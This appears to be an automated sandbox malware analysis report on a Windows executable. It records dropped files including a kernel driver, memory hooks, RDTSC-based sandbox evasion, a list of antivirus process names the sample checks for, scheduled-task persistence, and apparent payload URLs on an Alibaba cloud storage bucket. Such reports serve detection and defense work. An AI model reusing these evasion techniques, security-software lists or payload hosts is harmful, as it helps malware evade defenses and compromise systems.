Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\vtxXmC.exeJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\vtxXmC.exeJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,12_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\vtxXmC.exeMemory written: PID: 1788 base: 7FFB2D030008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeMemory written: PID: 1788 base: 7FFB2CECD9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeMemory written: PID: 1532 base: 7FFB2D030008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeMemory written: PID: 1532 base: 7FFB2CECD9F0 value: E9 20 26 16 00 Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeRDTSC instruction interceptor: First address: 140001113 second address: 14000112A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeRDTSC instruction interceptor: First address: 14000112A second address: 14000112A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F2F10BC0C80h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeWindow / User API: threadDelayed 527Jump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeWindow / User API: threadDelayed 472Jump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\vtxXmC.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_12-14043
Source: C:\Users\user\Documents\vtxXmC.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe TID: 5912Thread sleep count: 527 > 30Jump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe TID: 5912Thread sleep time: -263500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe TID: 5912Thread sleep count: 472 > 30Jump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe TID: 5912Thread sleep time: -236000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00007FFB23B0A1B8 FindFirstFileExW,12_2_00007FFB23B0A1B8
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.0000000000578000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2105058607.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\vtxXmC.exeAPI call chain: ExitProcess graph end nodegraph_12-14044
Source: C:\Users\user\Documents\vtxXmC.exeAPI call chain: ExitProcess graph end nodegraph_12-14388
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00000001400073E0 LdrLoadDll,12_2_00000001400073E0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0000000140007C91
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_000000014000F000
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,12_2_0000000140004630
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0000000140007C91
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000001400106B0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00000001400092E0 SetUnhandledExceptionFilter,12_2_00000001400092E0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00007FFB23B01F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FFB23B01F50
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00007FFB23B076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FFB23B076E0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00007FFB23B02630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FFB23B02630

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Documents\vtxXmC.exeNtProtectVirtualMemory: Indirect: 0x29CB253Jump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeNtDelayExecution: Indirect: 0x1F94E4Jump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeNtProtectVirtualMemory: Indirect: 0x2B9B253Jump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00007FFB23B0FD40 cpuid 12_2_00007FFB23B0FD40
Source: C:\Users\user\Documents\vtxXmC.exeCode function: GetLocaleInfoA,12_2_000000014000F370
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_000000014000A370
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_0000000140005A70
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: vtxXmC.exe, 0000000C.00000002.2265671908.0000000002798000.00000002.00001000.00020000.00000000.sdmp, vtxXmC.exe, 0000000D.00000002.2274941508.0000000002968000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,12_2_00000001400042B0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,12_2_0000000140003F80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Service Execution
24
Windows Service
1
Access Token Manipulation
31
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
24
Windows Service
1
Virtualization/Sandbox Evasion
LSASS Memory131
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Process Injection
1
Access Token Manipulation
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism
1
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync123
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
2b687482300.6345827638.08.exe13%ReversingLabs
2b687482300.6345827638.08.exe12%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\Documents\vtxXmC.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifs0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifK0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gif.0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifP0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifg0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifR0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/ft0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifhttps://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifb0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifg0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-10030%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/h0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/30%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/pgY0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/7-2476756634-10030%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifb0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifjC0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
39.103.20.34
truefalse
    high
    msd1sq.oss-cn-beijing.aliyuncs.com
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://msd1sq.oss-cn-beijing.aliyuncs.com/a.giffalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/b.giffalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/i.datfalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/c.giffalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/s.datfalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/s.jpgfalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/d.giffalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifs2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifK2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifhttps://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifhttp2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/ft2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gif.2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifR2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://ocsp.thawte.com0189atohci.sys.0.dr, vtxXmC.exe.0.drfalse
        high
        https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifg2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifP2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifb2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.symauth.com/cps0(vtxXmC.exe.0.drfalse
          high
          https://msd1sq.oss-cn-beijing.aliyuncs.com/2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.0000000000584000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://msd1sq.oss-cn-beijing.aliyuncs.com/32b687482300.6345827638.08.exe, 00000000.00000003.2105058607.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifg2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.thawte.com/ThawteTimestampingCA.crl0189atohci.sys.0.dr, vtxXmC.exe.0.drfalse
            high
            http://www.symauth.com/rpa00vtxXmC.exe.0.drfalse
              high
              https://msd1sq.oss-cn-beijing.aliyuncs.com/pgY2b687482300.6345827638.08.exe, 00000000.00000003.2105058607.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-10032b687482300.6345827638.08.exe, 00000000.00000003.2105058607.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/7-2476756634-10032b687482300.6345827638.08.exe, 00000000.00000003.2105058607.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/h2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifb2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifjC2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.0000000000583000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.0000000000584000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              39.103.20.34
              sc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
              37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1584369
              Start date and time:2025-01-05 10:03:09 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 1s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:15
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:2b687482300.6345827638.08.exe
              Detection:MAL
              Classification:mal80.evad.winEXE@3/12@1/1
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 58%
              • Number of executed functions: 6
              • Number of non-executed functions: 105
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target vtxXmC.exe, PID 1532 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              04:04:05API Interceptor941x Sleep call for process: 2b687482300.6345827638.08.exe modified
              11:30:15Task SchedulerRun new task: Va2km path: C:\Users\user\Documents\vtxXmC.exe
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdN5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
              • 101.201.227.94
              N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
              • 101.201.227.94
              3.elfGet hashmaliciousUnknownBrowse
              • 8.189.180.251
              3.elfGet hashmaliciousUnknownBrowse
              • 8.138.48.163
              armv6l.elfGet hashmaliciousUnknownBrowse
              • 223.4.27.34
              armv5l.elfGet hashmaliciousUnknownBrowse
              • 8.130.140.184
              fuckunix.sh4.elfGet hashmaliciousMiraiBrowse
              • 8.158.86.51
              Fantazy.i686.elfGet hashmaliciousUnknownBrowse
              • 8.132.136.89
              Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
              • 47.114.163.84
              Fantazy.spc.elfGet hashmaliciousUnknownBrowse
              • 8.167.229.71
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
              • 39.103.20.34
              IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
              • 39.103.20.34
              Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
              • 39.103.20.34
              c2.htaGet hashmaliciousRemcosBrowse
              • 39.103.20.34
              file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
              • 39.103.20.34
              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
              • 39.103.20.34
              HGwpjJUqhW.exeGet hashmaliciousGhostRatBrowse
              • 39.103.20.34
              http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
              • 39.103.20.34
              nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
              • 39.103.20.34
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\Documents\vtxXmC.exe45631.exeGet hashmaliciousNitolBrowse
                45631.exeGet hashmaliciousUnknownBrowse
                  0000000000000000.exeGet hashmaliciousNitolBrowse
                    0000000000000000.exeGet hashmaliciousUnknownBrowse
